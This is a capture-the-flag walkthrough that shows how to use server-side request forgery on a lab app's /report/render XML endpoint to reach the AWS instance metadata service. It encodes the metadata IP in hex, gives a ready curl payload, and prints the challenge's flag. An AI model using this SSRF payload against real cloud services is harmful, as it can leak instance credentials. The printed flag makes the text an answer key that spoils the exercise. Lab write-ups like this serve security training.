Blind Trust - TOKEN3

Base URL: http://nebula:5000

Background

The /report/render endpoint accepts XML with a <report><url> structure and fetches the specified URL server-side. The endpoint restricts URLs to hex-encoded IP addresses targeting the AWS IMDS endpoint (169.254.169.254).

From Nothing to Working

Start point: the /help page documents /report/render as accepting XML with <report> tags and notes it “Only accepts HEX addresses.”

Iterations:

1. Submit a basic <report> XML to confirm the endpoint parses it.
2. Receive error: “Only HEX encoded IPs allowed in tag; valid destinations: 169.254.169.254; structure: http://0xVALUE/latest/metadata”
3. Convert 169.254.169.254 to hex: 0xA9FEA9FE.
4. Submit the SSRF payload with the hex-encoded IMDS URL.
5. The server fetches the IMDS endpoint and returns the token.

Goal

Perform SSRF via the /report/render endpoint to reach the IMDS metadata service.

Command

curl -X POST http://nebula:5000/report/render \
  -H "Content-Type: application/xml" \
  -d '<report><url>http://0xA9FEA9FE/latest/metadata</url></report>'

IP Conversion

169.254.169.254 in hex:

• 169 = 0xA9
• 254 = 0xFE
• 169 = 0xA9
• 254 = 0xFE
• Combined: 0xA9FEA9FE

Expected Output

Look for:

Report accepted.
TOKEN3: PCCC{BLT-g1E5Us}

Learn More

• https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
• https://cwe.mitre.org/data/definitions/918.html
• https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html